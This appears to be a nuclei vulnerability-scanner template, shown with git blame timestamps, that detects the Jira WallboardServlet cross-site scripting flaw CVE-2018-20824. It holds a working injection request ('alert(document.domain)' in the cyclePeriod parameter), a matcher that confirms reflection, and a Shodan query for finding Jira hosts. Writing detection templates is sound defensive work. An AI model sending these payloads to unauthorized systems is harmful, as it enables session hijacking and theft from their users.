nuclei-templates/http/cves/2018/CVE-2018-20824.yaml

45 lines
1.8 KiB
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-20824
2020-06-22 13:35:37 +00:00
info:
name: Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting
2021-06-09 12:20:56 +00:00
author: madrobot,dwisiswant0
2020-06-22 13:35:37 +00:00
severity: medium
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:57:14 +00:00
remediation: |
Upgrade to Atlassian Jira version 7.13.1 or later to mitigate this vulnerability.
reference:
- https://jira.atlassian.com/browse/JRASERVER-69238
- https://nvd.nist.gov/vuln/detail/CVE-2018-20824
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-20824
cwe-id: CWE-79
epss-score: 0.00203
epss-percentile: 0.5806
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
2022-07-04 13:18:51 +00:00
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: atlassian
product: jira
2023-09-06 12:57:14 +00:00
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2018,atlassian,jira,xss
2020-06-22 13:35:37 +00:00
http:
2020-06-22 13:35:37 +00:00
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
2023-07-11 19:49:27 +00:00
matchers-condition: and
2020-06-22 13:35:37 +00:00
matchers:
- type: regex
2023-07-11 19:49:27 +00:00
part: body
regex:
- (?mi)timeout:\salert\(document\.domain\)
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a004730450220788e8b452d609b9abee87332db316c894ee831deec4c0cdb03d96e5cf54a43480221008ab1f74bd609c5777471c28ac497d68400b024ec1548d6fd6ced4fa8ff69c73c:922c64590222798bb761d5b6d8e72950